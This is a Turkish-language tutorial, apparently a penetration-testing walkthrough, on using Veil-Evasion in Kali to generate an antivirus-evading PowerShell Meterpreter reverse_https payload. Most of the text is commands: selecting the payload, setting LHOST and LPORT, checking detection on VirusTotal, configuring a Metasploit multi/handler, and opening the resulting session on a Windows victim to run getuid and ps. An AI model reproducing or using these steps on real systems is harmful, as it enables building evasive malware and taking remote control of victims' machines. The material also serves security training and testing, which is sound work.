Veil-Evasion aracı kurulu bir Kali bilgisayarda Veil-Evasion kurulum dizini (/root/Veil/Veil-Evasion/ gibi) içerisindeki python betiği çalıştırılarak zararlı yazılım oluşturulabilir.
ls
./Veil-Evasion.py
Betik çalıştırıldıktan sonra, tüm payload çeşitleri listelenebilir.
list
Şubat 2015 itibari ile yayında olan Veil-Evasion veritabanında 39 adet payload bulunduğu görülmektedir.
Veil-Evasion komut satırında “info” komutundan sonra payload adı veya payload ID değeri girilerek payload hakkında ayrıntılı bilgi edinilebilir.
info 17
info powershell/meterpreter/rev_https
Veil-Evasion komut satırında direk olarak payload ID değeri girilerek, “use” komutundan sonra payload adı veya payload ID değeri girilerek kullanılmak istenen payload seçilebilir.
17
use 17
use powershell/meterpreter/rev_https
Seçilen payload parametreleri ayarlanarak, payload oluşturulmasına başlanabilir.
set LHOST 192.168.244.146
set LPORT 443
generate
Veil-Evasion ile oluşturulan dosyaya isim verilir.
Oluşan betik dosyası /usr/share/veil-evasion/compiled dizinine kayıt edilmiştir.
Betik dosyasının içeriğinde bir powershell betiği olduğu görülmektedir.
Ayrıca “/usr/share/veil-evasion/handlers” dizinine bir kaynak dosyası (resource file) kayıt edilmiştir.
Bu dosyanın içeriğinde MSF multi-handler istismar modülüne ait seçeneklerin bulunduğu görülmektedir.
Hazırlanan zararlı uygulama VirusTotal ile taratıldığında 57 antivirüsten 10 tanesi tarafından tespit edilebileceği görülmektedir.
İpucu: Çok etkin bir sonuc vermese de “/usr/share/veil-evasion” dizini altındaki “hashes.txt” dosyası içerisinde oluşan dosyanın özet değeri bulunmaktadır. Bu değer VirusTotal’e verilerek veya Veil-Evasion komut satırındaki “checkvt” komutuna verilerek antivirüsler tarafından daha önceden tespit edilip edilmediği incelenebilir.
checkvt 7cdf8a5b3be020d56a248c56809a3db055129ea3
Hazırlanan zararlı uygulama çalıştırıldığında, bir talep oluşacaktır. Bu talebin yakalanması için bir MSF multi-handler oluşturulur ve beklenir.
use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.244.146
set LPORT 443
set ExitOnSession false
exploit -j -z
Zararlı yazılım Windows bir işletim sistemi çalıştırıldığında, Meterpreter bağlantı talebinin MSF multi-handler istismar modülü tarafından yakalandığı görülmektedir.
sessions
Hazırlanan payload ile kullanıcı hakları ile yeni bir proses oluştuğu görülmektedir.
sessions -i 1
getuid
getpid
ps -U Yonetici